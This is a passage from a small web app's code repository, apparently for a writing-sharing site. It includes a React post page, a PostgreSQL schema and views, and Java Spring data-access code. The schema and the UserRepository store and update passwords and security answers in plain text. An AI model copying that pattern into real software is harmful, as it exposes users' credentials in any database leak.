d="M4 6h16M4 12h16M4 18h16" />
</svg>
{/* Menu open: "block", Menu closed: "hidden" */}
<svg className="hidden h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M6 18L18 6M6 6l12 12" />
</svg>
</button>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Open: "block", closed: "hidden"
*/}
<div className='hidden'>
<div className="px-2 pt-2 pb-3 space-y-1 sm:px-3">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-white bg-gray-900 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Team</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Projects</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Calendar</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Reports</a>
</div>
<div className="pt-4 pb-3 border-t border-gray-700">
<div className="flex items-center px-5 space-x-3" onClick={() => this.setState(state => ({ profileMenuOpen: !state.profileMenuOpen }))}>
<div className="flex-shrink-0">
<img className="h-10 w-10 rounded-full"
src="https://images.unsplash.com/photo-1472099645785-5658abf4ff4e?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=facearea&facepad=2&w=256&h=256&q=80"
alt="" />
</div>
<div className="space-y-1">
<div className="text-base font-medium leading-none text-white"><NAME></div>
<div className="text-sm font-medium leading-none text-gray-400"><EMAIL></div>
</div>
</div>
<div className="mt-3 px-2 space-y-1">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Your
Profile</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Settings</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Sign
out</a>
</div>
</div>
</div>
</nav>
<main className="profile-page">
<section className="relative block h-1/3" style={{ height: 300 + 'px' }}>
</section>
<section className="relative py-24 bg-gray-800">
<div className="container mx-auto px-4">
<div
className="relative flex flex-col min-w-0 break-words bg-white w- mb-6 shadow-2xl rounded-lg -mt-80">
{/*<h1 className="mt-16 text-3xl font-semibold" style="padding-left: 5.5rem;">Sign Up</h1>*/}
<section className="text-gray-700 body-font relative px-5">
<div className="container px-5 mb-5 mx-auto flex sm:flex-no-wrap flex-wrap">
<div className=" bg-white flex flex-col md:ml-auto w-full">
<p className="text-4xl mb-1 mt-6">{this.state.post.title}</p>
<p className="font-thin text-xl mt-2 leading-5">By <span className="font-normal">{this.state.post.postedbyUsername}</span> on {this.state.post.postedDate} <span className="ml-6"></span>
<span
className="text-gray-600 mr-3 inline-flex items-center ml-auto leading-none text-sm pr-3 py-1 border-gray-800">
{/* Like, dislike view request buttons*/}
<button onClick={() => this.handleLike()}>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M14 10h4.764a2 2 0 011.789 2.894l-3.5 7A2 2 0 0115.263 21h-4.017c-.163 0-.326-.02-.485-.06L7 20m7-10V5a2 2 0 00-2-2h-.095c-.5 0-.905.405-.905.905 0 .714-.211 1.412-.608 2.006L7 11v9m7-10h-2M7 20H5a2 2 0 01-2-2v-6a2 2 0 012-2h2.5">
</path>
</svg>
</button>{this.state.post.nposReactions}
<span className="ml-4"></span>
<button onClick={() => this.handleDislike()}>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 14H5.236a2 2 0 01-1.789-2.894l3.5-7A2 2 0 018.736 3h4.018a2 2 0 01.485.06l3.76.94m-7 10v5a2 2 0 002 2h.096c.5 0 .905-.405.905-.904 0-.715.211-1.413.608-2.008L17 13V4m-7 10h2m5-10h2a2 2 0 012 2v6a2 2 0 01-2 2h-2.5">
</path>
</svg>
</button>{this.state.post.nnegReactions}
<span className="ml-4"></span>
<button onClick={() => this.setState({ vrDialogOpen: true })}>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8.684 13.342C8.886 12.938 9 12.482 9 12c0-.482-.114-.938-.316-1.342m0 2.684a3 3 0 110-2.684m0 2.684l6.632 3.316m-6.632-6l6.632-3.316m0 0a3 3 0 105.367-2.684 3 3 0 00-5.367 2.684zm0 9.316a3 3 0 105.368 2.684 3 3 0 00-5.368-2.684z"></path>
</svg>
</button>
<span class="ml-4" />
<button onClick={() => this.handleSavePost()}>
<svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 5a2 2 0 012-2h10a2 2 0 012 2v16l-7-3.5L5 21V5z"></path></svg>
</button>
</span>
</p>
<div className="mt-4 leading-7">
<p className="text-lg font-normal mt-4">{this.state.post.content}</p>
</div></div>
</div>
<div className="w-full flex flex-col text-center md:text-left md:flex-row shadow border-indigo-50 mt-10 mb-10 p-6 rounded-lg">
<div className="flex-1 flex flex-col justify-center md:justify-start rounded-lg pb-4">
<p className="font-bold ml-4 text-2xl">Author</p>
<p className="font-semibold mt-4 ml-4 text-xl">{this.state.post.postedbyUsername}</p>
<p className="pt-2 ml-4">{this.state.post.postedbyBio}</p>
</div>
</div>
</section>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<div className="flex flex-col ml-4">
<p className="text-white text-4xl px-3">Comments</p>
<div className="w-full mt-8 px-4">
<textarea className="w-full bg-gray-800 rounded border border-gray-700 text-white focus:outline-none h-20 focus:border-blue-500 text-base px-4 py-2 resize-none block" placeholder="Post your comment" name="thisUserComment" onChange={this.handleOptions}></textarea>
</div>
<div className="grid lg:grid-cols-4 md:grid-cols-4 sm:grid-cols-1">
<label className="inline-flex items-center ml-6 mt-2">
<input type="checkbox" className="form-checkbox form-checkbox-dark text-indigo-600" onChange={this.handleOptions} name="thisAnonymousComment" />
<span className="ml-2 text-gray-400 font-thin">Anonymous</span>
</label>
<label className="inline-flex items-center ml-6 mt-3">
<input type="radio" className="form-radio form-radio-dark text-green-500" name="accountType" value="positive" />
<span className="ml-2">Positive</span>
</label>
<label className="inline-flex items-center ml-6 mt-3">
<input type="radio" className="form-radio form-radio-dark text-red-600" name="accountType" value="negative" />
<span className="ml-2">Negative</span>
</label>
<div className="p-2 w-full mt-3">
<button onClick={() => this.handlePostComment()} className="flex mx-auto text-white bg-blue-500 border-0 py-2 px-8 focus:outline-none hover:bg-blue-600 rounded text-lg">Post</button>
</div>
</div>
<section className="text-gray-500 bg-gray-900 body-font overflow-hidden">
<div className="container px-5 py-24 mx-auto">
<div className="-my-8">
{this.state.comments.map((comment) =>
<Comment content={comment.content}
postedbyUsername={comment.postedbyUsername}
anonymous={comment.anonymous} />
)}
</div>
</div>
</section>
</div>
</div>
</footer>
</div>
</div>
</section>
</main>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a
className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="2" className="w-5 h-5"
viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5"
viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
</div>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
<div>
<Dialog open={this.state.vrDialogOpen} onClose={() => { this.setState({vrDialogOpen: false}) }} aria-labelledby="form-dialog-title">
<DialogTitle id="form-dialog-title">Send view request</DialogTitle>
<DialogContent>
<DialogContentText>
Enter the username of the person you want to send this post to:
</DialogContentText>
<TextField
onChange={this.handleOptions}
autoFocus
margin="dense"
name="sendVrToUsername"
id="sendVrToUsername"
label="Send to? (username)"
variant="outlined"
fullWidth
/>
</DialogContent>
<DialogActions>
<Button onClick={() => this.handleSendVR()} color="primary">
Send
</Button>
<Button onClick={() => { this.setState({vrDialogOpen: false}) }} color="primary">
Cancel
</Button>
</DialogActions>
</Dialog>
</div>
</div>
);
}
}<file_sep>-- TABLE CREATION FOR WRITER'S KALICE DB
-- NOTE:
-- Prefill test - Prefill for testing purposes
-- Prefill test opt - Prefill for testing purposes, but optional
-- Prefill all init - Prefill all data for initialization of system
-- Prefill some init - Prefill some data for initialization of system
-- INSERTS: Prefill test
CREATE TABLE users_table (
user_id SERIAL UNIQUE NOT NULL,
username VARCHAR(20) UNIQUE NOT NULL,
join_date DATE NOT NULL,
security_qn VARCHAR(100) NOT NULL,
security_ans VARCHAR(40) NOT NULL,
privacy_det_id INTEGER NOT NULL,
CONSTRAINT user_id_pk PRIMARY KEY (user_id)
);
-- INSERTS: Prefill test
CREATE TABLE user_email_ids (
user_id INTEGER,
email VARCHAR,
CONSTRAINT user_id_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT user_email_pk PRIMARY KEY (user_id, email)
);
-- INSERTS: Prefill test
CREATE TABLE auth_helper_passes (
passwd VARCHAR(30) UNIQUE NOT NULL,
half_key VARCHAR(30) NOT NULL,
CONSTRAINT auth_helper_pass_pk PRIMARY KEY (passwd, half_key)
);
-- INSERTS: Prefill test
CREATE TABLE auth_helper_userauths (
user_id INTEGER NOT NULL,
auth_id SERIAL NOT NULL,
passwd VARCHAR NOT NULL,
CONSTRAINT auth_helper_userauth_pk PRIMARY KEY (user_id, auth_id),
CONSTRAINT passwd_fk FOREIGN KEY (passwd) REFERENCES auth_helper_passes(passwd),
CONSTRAINT user_id_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id)
);
-- INSERTS: Prefill all init
CREATE TABLE ranks (
rank_id SERIAL PRIMARY KEY,
description VARCHAR(20) NOT NULL, -- Newbie, rookie, etc.
num_stars FLOAT NOT NULL
);
-- INSERT INTO ranks VALUES (0, 'Starter', 0);
-- INSERTS: Prefill test
CREATE TABLE profiles (
user_id INTEGER UNIQUE NOT NULL,
name VARCHAR NOT NULL,
about_me VARCHAR NULL,
is_above_eighteen BOOLEAN NOT NULL,
npos_reacts INTEGER NOT NULL DEFAULT 0,
profile_pic_url TEXT NOT NULL DEFAULT '',
rank_id INTEGER NOT NULL DEFAULT 0,
CONSTRAINT profile_pk PRIMARY KEY (user_id, name),
CONSTRAINT profile_rank_fk FOREIGN KEY (rank_id) REFERENCES ranks(rank_id)
);
-- INSERTS: Prefill all init
CREATE TABLE privacy_details (
detail_id SERIAL PRIMARY KEY,
show_interests BOOLEAN NOT NULL,
show_name BOOLEAN NOT NULL,
show_bio BOOLEAN NOT NULL
);
ALTER TABLE users_table ADD CONSTRAINT privacy_fk FOREIGN KEY (privacy_det_id) REFERENCES privacy_details(detail_id);
-- INSERTS: Prefill some init
CREATE TABLE interest_tags (
interest_id SERIAL PRIMARY KEY,
description VARCHAR(30) NOT NULL
);
-- INSERTS: Prefill test
CREATE TABLE profile_interests (
user_id INTEGER NOT NULL,
name VARCHAR NOT NULL,
interest_id INTEGER NOT NULL,
CONSTRAINT profile_interests_pk PRIMARY KEY (user_id, name, interest_id),
CONSTRAINT interest_fk FOREIGN KEY (interest_id) REFERENCES interest_tags(interest_id)
);
-- INSERTS: Prefill test
CREATE TABLE posts (
post_id SERIAL PRIMARY KEY,
title TEXT NOT NULL DEFAULT '',
content TEXT NOT NULL,
anonymous BOOLEAN NOT NULL,
min_rank INTEGER NOT NULL,
expiry_date DATE NULL,
posted_date DATE NOT NULL,
is_above_eighteen BOOLEAN NOT NULL,
postedby_uid INTEGER NOT NULL,
CONSTRAINT postedby_fk FOREIGN KEY (postedby_uid) REFERENCES users_table(user_id),
CONSTRAINT date_ck CHECK (expiry_date IS NULL OR expiry_date > posted_date),
CONSTRAINT rank_ck CHECK (min_rank >= 0) -- TODO: check upper limit too
);
-- INSERTS: Prefill test opt
CREATE TABLE view_requests (
from_user_id INTEGER NOT NULL,
to_user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
sent_date_time TIMESTAMP WITH TIME ZONE NOT NULL,
CONSTRAINT view_requests_pk PRIMARY KEY (from_user_id, to_user_id, post_id, sent_date_time),
CONSTRAINT from_uid_fk FOREIGN KEY (from_user_id) REFERENCES users_table(user_id),
CONSTRAINT to_uid_fk FOREIGN KEY (to_user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE saved_posts (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
CONSTRAINT saved_posts_pk PRIMARY KEY (user_id, post_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE seen_posts (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
CONSTRAINT seen_posts_pk PRIMARY KEY (user_id, post_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE reactions (
reaction_id SERIAL PRIMARY KEY,
description VARCHAR NOT NULL,
pos_neg VARCHAR(9) NOT NULL,
CONSTRAINT pos_neg_ck CHECK (pos_neg in ('positive', 'negative'))
);
-- INSERTS: Prefill test opt
CREATE TABLE post_reactions (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
reaction_id INTEGER NOT NULL,
anonymous BOOLEAN NOT NULL DEFAULT FALSE,
CONSTRAINT post_reactions_pk PRIMARY KEY (user_id, post_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY(post_id) REFERENCES posts(post_id),
CONSTRAINT reaction_id FOREIGN KEY (reaction_id) REFERENCES reactions(reaction_id)
);
-- INSERTS: Prefill test opt
CREATE TABLE comments (
comment_id SERIAL PRIMARY KEY,
content TEXT NOT NULL,
posted_dt_tm TIMESTAMPTZ NOT NULL,
anonymous BOOLEAN NOT NULL DEFAULT FALSE
);
-- INSERTS: Prefill test opt, with comments
CREATE TABLE comment_text_pos_neg (
content TEXT PRIMARY KEY,
pos_neg VARCHAR(9) NOT NULL,
-- CONSTRAINT comment_text_pos_neg_fk FOREIGN KEY (content) REFERENCES comments(content),
CONSTRAINT pos_neg_ck CHECK (pos_neg in ('positive', 'negative'))
);
-- INSERTS: Prefill test opt, with comments and posts
CREATE TABLE post_comments (
user_id INTEGER NOT NULL,
post_id INTEGER NOT NULL,
comment_id INTEGER NOT NULL,
CONSTRAINT post_comments_pk PRIMARY KEY (user_id, post_id, comment_id),
CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users_table(user_id),
CONSTRAINT post_fk FOREIGN KEY (post_id) REFERENCES posts(post_id),
CONSTRAINT comment_fk FOREIGN KEY (comment_id) REFERENCES comments(comment_id)
);
-- INSERTS: Prefill test, with posts
CREATE TABLE post_interests (
post_id INTEGER NOT NULL,
interest_id INTEGER NOT NULL,
CONSTRAINT post_interests_pk PRIMARY KEY (post_id, interest_id),
CONSTRAINT post_fk FOREIGN KEY (post_id) REFERENCES posts(post_id),
CONSTRAINT interest_fk FOREIGN KEY (interest_id) REFERENCES interest_tags(interest_id)
);
<file_sep>package com.writerskalice.server.models.postmodels;
import lombok.AllArgsConstructor;
import lombok.Data;
import lombok.NoArgsConstructor;
@Data
@NoArgsConstructor
@AllArgsConstructor
public class ReactOnPostData {
private Integer reactedbyUid;
private Integer reactedonPid;
private Integer reactionId;
}
<file_sep>package com.writerskalice.server.models.postmodels;
import lombok.AllArgsConstructor;
import lombok.Data;
import lombok.NoArgsConstructor;
import java.util.ArrayList;
@Data
@NoArgsConstructor
@AllArgsConstructor
public class CreatePostData {
private String title;
private String content;
private Boolean isAboveEighteen;
private ArrayList<Integer> tags;
private Integer postedbyUid;
private Boolean anonymous;
}
<file_sep>
-- /posts/getPost
-- can also be used for /posts/getNewPosts
CREATE OR REPLACE VIEW posts_postedby_uname AS
SELECT p.post_id as post_id, ut.username as postedby_username
FROM posts p
LEFT JOIN users_table ut on p.postedby_uid = ut.user_id;
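-- Aggregates per-post comment and positive/negative reaction counts and attaches the poster's username.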
CREATE OR REPLACE VIEW getpost_view_com_rcn_int AS
SELECT interm_no_interests.post_id as post_id, content, title, anonymous,
min_rank, expiry_date, posted_date,
is_above_eighteen, postedby_uid, postedby_username,
n_comments, n_pos_rcn, n_neg_rcn
FROM (
(
SELECT p.post_id as post_id, p.content as content, p.title as title,
p.anonymous as anonymous, min_rank, expiry_date, posted_date,
is_above_eighteen, postedby_uid,
COALESCE(COUNT(pcom.comment_id), 0) as n_comments,
COALESCE(SUM(
CASE rcn.pos_neg
WHEN 'positive' THEN 1
ELSE 0
END
), 0) AS n_pos_rcn,
COALESCE(SUM (
CASE rcn.pos_neg
WHEN 'negative' THEN 1
ELSE 0
END
), 0) AS n_neg_rcn
FROM reactions rcn
RIGHT JOIN post_reactions prcn ON prcn.reaction_id = rcn.reaction_id
RIGHT JOIN posts p ON p.post_id = prcn.post_id
RIGHT JOIN post_comments pcom ON p.post_id = pcom.post_id
GROUP BY p.post_id
)
AS interm_no_interests
LEFT JOIN posts_postedby_uname
ON interm_no_interests.post_id = posts_postedby_uname.post_id
)
LEFT JOIN post_interests pint ON interm_no_interests.post_id = pint.post_id
WHERE posts_postedby_uname.post_id = interm_no_interests.post_id;
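-- Test data left over from development (the same row is inserted by the prefill script):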
insert into post_reactions values (2, 1, 1, false);
-- /posts/getComments
-- Note: This view DOES NOT join the posts table.
DROP VIEW IF EXISTS get_comments;
CREATE OR REPLACE VIEW get_comments AS
SELECT pc.post_id, pc.user_id as postedby_uid, ut.username as postedby_username,
c.content, c.anonymous, c.posted_dt_tm
FROM users_table ut
RIGHT JOIN post_comments pc ON pc.user_id = ut.user_id
LEFT JOIN comments c ON pc.comment_id = c.comment_id;
-- /posts/getSavedPosts
CREATE OR REPLACE VIEW get_saved_posts AS
SELECT ut.user_id, gpv.post_id, content, title, anonymous,
min_rank, expiry_date, posted_date, postedby_uid, postedby_username,
n_comments, n_pos_rcn, n_neg_rcn
FROM users_table ut
LEFT JOIN saved_posts sp ON ut.user_id = sp.user_id
LEFT JOIN getpost_view_com_rcn_int gpv ON sp.post_id = gpv.post_id;
-- /posts/getReactionDetails (Inactive for now)
-- Note: This view DOES NOT join the posts table.
CREATE OR REPLACE VIEW get_reactions AS
SELECT pr.post_id as post_id, r.reaction_id as reaction_id, r.description as description,
(CASE r.pos_neg WHEN 'positive' THEN TRUE ELSE FALSE END) as positivity
FROM post_reactions pr
LEFT JOIN reactions r ON pr.reaction_id = r.reaction_id;
-- /posts/getInterestTags
CREATE OR REPLACE VIEW posts_get_interest_tags AS
SELECT pi.post_id as post_id, pi.interest_id as interest_id, description
FROM post_interests pi
LEFT JOIN interest_tags it on pi.interest_id = it.interest_id;
-- /user/profileDisplay
CREATE OR REPLACE VIEW profile_info AS
SELECT user_id, name, about_me, p.rank_id as rank_id, r.num_stars as num_stars,
r.description as rank_desc
FROM profiles p
LEFT JOIN ranks r ON p.rank_id = r.rank_id;
CREATE OR REPLACE VIEW user_privacy AS
SELECT user_id, show_interests, show_name, show_bio, username
FROM users_table ut
LEFT JOIN privacy_details pd on ut.privacy_det_id = pd.detail_id;
CREATE OR REPLACE VIEW profile_display AS
SELECT pi.user_id as user_id, name, about_me, rank_id, num_stars,
rank_desc, show_interests, show_name, show_bio, username
FROM profile_info pi
LEFT JOIN user_privacy up on pi.user_id = up.user_id;
-- /user/getInterestTags
CREATE OR REPLACE VIEW user_get_interest_tags AS
SELECT pi.user_id as user_id, pi.interest_id as interest_id, description
FROM profile_interests pi
LEFT JOIN interest_tags it on pi.interest_id = it.interest_id;<file_sep>package com.writerskalice.server.dao;
import com.writerskalice.server.models.getmodels.UserDisplayProfile;
import com.writerskalice.server.models.getmodels.UserProfileSettings;
import com.writerskalice.server.models.postmodels.CreateUserProfileData;
import com.writerskalice.server.models.postmodels.UpdateProfileData;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.stereotype.Repository;
import org.springframework.transaction.annotation.Transactional;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.HashMap;
import java.util.Map;
@Repository
public class UserRepository implements IUserDao {
@Autowired
private JdbcTemplate jdbcTemplate;
@Override
public UserDisplayProfile retrieveUserDisplay(String username) {
System.out.println("Hello hello!");
Integer userId = jdbcTemplate.queryForObject("select user_id from users_table where username = ?",
new Object[]{username}, (rs, rn) -> rs.getInt(1));
System.out.println(userId);
Map<String, Object> res =
jdbcTemplate.queryForObject("select name, username, rank_id, rank_desc, num_stars, about_me as bio, show_name, show_bio, show_interests " +
"from profile_display " + "where user_id = ?;", new Object[]{userId},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("name", rs.getString(1));
resultMap.put("username", rs.getString(2));
resultMap.put("rankId", rs.getInt(3));
resultMap.put("rankDesc", rs.getString(4));
resultMap.put("numStars", rs.getFloat(5));
resultMap.put("bio", rs.getString(6));
resultMap.put("showName", rs.getBoolean(7));
resultMap.put("showBio", rs.getBoolean(8));
resultMap.put("showInterests", rs.getBoolean(9));
return resultMap;
});
System.out.println(res);
UserDisplayProfile profile = new UserDisplayProfile();
profile.setName((String) res.get("name"));
profile.setUsername((String) res.get("username"));
profile.setBio((String) res.get("bio"));
profile.setRank((Integer) res.get("rankId"));
profile.setNumStars((Float) res.get("numStars"));
profile.setRankDesc((String) res.get("rankDesc"));
profile.setShowBio((Boolean) res.get("showBio"));
profile.setShowName((Boolean) res.get("showName"));
profile.setShowInterests((Boolean) res.get("showInterests"));
System.out.println("Hello hello!");
if (profile.getName() == null) {
System.out.println("null name");
}
System.out.println(profile.getName());
return profile;
}
@Override
public UserProfileSettings retrieveUserProfileSettings(Integer uid) {
Map<String, Object> res =
jdbcTemplate.queryForObject("select name, about_me as bio, rank_id, rank_desc, num_stars, show_name, show_bio, show_interests " +
"from profile_display where user_id = ?;", new Object[]{uid},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("name", rs.getString(1));
resultMap.put("bio", rs.getString(2));
resultMap.put("rankId", rs.getInt(3));
resultMap.put("rankDesc", rs.getString(4));
resultMap.put("numStars", rs.getFloat(5));
resultMap.put("showName", rs.getBoolean(6));
resultMap.put("showBio", rs.getBoolean(7));
resultMap.put("showInterests", rs.getBoolean(8));
return resultMap;
});
UserProfileSettings profileSettings = new UserProfileSettings();
profileSettings.setName((String) res.get("name"));
profileSettings.setBio((String) res.get("bio"));
profileSettings.setRank((Integer) res.get("rankId"));
profileSettings.setNumStars((Float) res.get("numStars"));
profileSettings.setRankDesc((String) res.get("rankDesc"));
profileSettings.setShowBio((Boolean) res.get("showBio"));
profileSettings.setShowName((Boolean) res.get("showName"));
profileSettings.setShowInterests((Boolean) res.get("showInterests"));
Map<String, Object> res2 =
jdbcTemplate.queryForObject("select email from user_email_ids where user_id = ?;",
new Object[]{uid},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("email", rs.getString(1));
return resultMap;
});
Map<String, Object> res3 =
jdbcTemplate.queryForObject("select is_above_eighteen from profiles where user_id = ?;",
new Object[]{uid},
(rs, rowNum) -> {
Map<String, Object> resultMap = new HashMap<>();
resultMap.put("isAboveEighteen", rs.getBoolean(1));
return resultMap;
});
profileSettings.setEmail((String) res2.get("email"));
profileSettings.setIsAboveEighteen((Boolean) res3.get("isAboveEighteen"));
return profileSettings;
}
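// Inserts a new user across users_table, user_email_ids, profiles, auth_helper_userauths and profile_interests; returns the new user id and a success flag.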
@Override
@Transactional
public Map<String, Object> createUserProfile(CreateUserProfileData data) {
/*Integer privacyId = jdbcTemplate.queryForObject("select detail_id from privacy_details " +
"where show_interests = ? and show_name = ? and show_bio = ?",
new Object[]{data.getShowInterestTags(), data.getShowName(), data.getShowBio()},
(rs, rn) -> rs.getInt(1));*/
Integer privacyId = 1;
System.out.println(privacyId);
DateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd");
java.util.Date date = new java.util.Date();
Boolean success = true;
System.out.println("Recs inserted: ");
System.out.println(jdbcTemplate.update("insert into users_table(username, join_date, security_qn, security_ans, privacy_det_id)" +
" values (?, ?, ?, ?, ?)",
data.getUsername(), date, '-', '-', privacyId));
Integer userId = jdbcTemplate.queryForObject("select user_id from users_table where username = ?",
new Object[]{data.getUsername()}, (rs, rn) -> rs.getInt(1));
System.out.println(jdbcTemplate.update("insert into user_email_ids values (?, ?);",
userId, data.getEmail()));
success = (jdbcTemplate.update("insert into profiles(user_id, name, about_me, is_above_eighteen) values (?, ?, ?, ?)",
userId, data.getName(), data.getBio(), data.getIsAboveEighteen()) > 0) && success;
success = (jdbcTemplate.update("insert into auth_helper_userauths(user_id, passwd) values (?, ?)",
userId, data.getPassword()) > 0) && success;
// Now for profile interests
for (Integer tagId : data.getTags()) {
success = (jdbcTemplate.update("insert into profile_interests values (?, ?, ?)", userId, data.getName(), tagId) > 0) && success;
}
Map<String, Object> results = new HashMap<>();
results.put("userId", userId);
results.put("success", success);
return results;
}
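// Updates the user's account, email, profile and password rows, then replaces the profile_interests entries.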
@Override
public Boolean updateUserProfile(UpdateProfileData data) {
Integer privacyId = jdbcTemplate.queryForObject("select detail_id from privacy_details " +
"where show_interests = ? and show_name = ? and show_bio = ?",
new Object[]{data.getShowInterestTags(), data.getShowName(), data.getShowBio()},
(rs, rn) -> rs.getInt(1));
Boolean success;
success = jdbcTemplate.update("update users_table set username = ?, privacy_det_id = ? " +
" where user_id = ?;",
data.getUsername(), privacyId, data.getUid()) > 0;
success = (jdbcTemplate.update("update user_email_ids set email = ? where user_id = ?;",
data.getEmail(), data.getUid()) > 0) && success;
success = (jdbcTemplate.update("update profiles set name = ?, about_me = ?, is_above_eighteen = ? " +
"where user_id = ? and name = ?",
data.getName(), data.getBio(), data.getIsAboveEighteen(), data.getUid(), data.getName()) > 0)
&& success;
success = (jdbcTemplate.update("update auth_helper_userauths set passwd = ? where user_id = ?",
data.getPassword(), data.getUid()) > 0) && success;
// Now for profile interests
// First delete the existing tags, then re-insert
success = (jdbcTemplate.update("delete from profile_interests where user_id = ?", data.getUid()) > 0) && success;
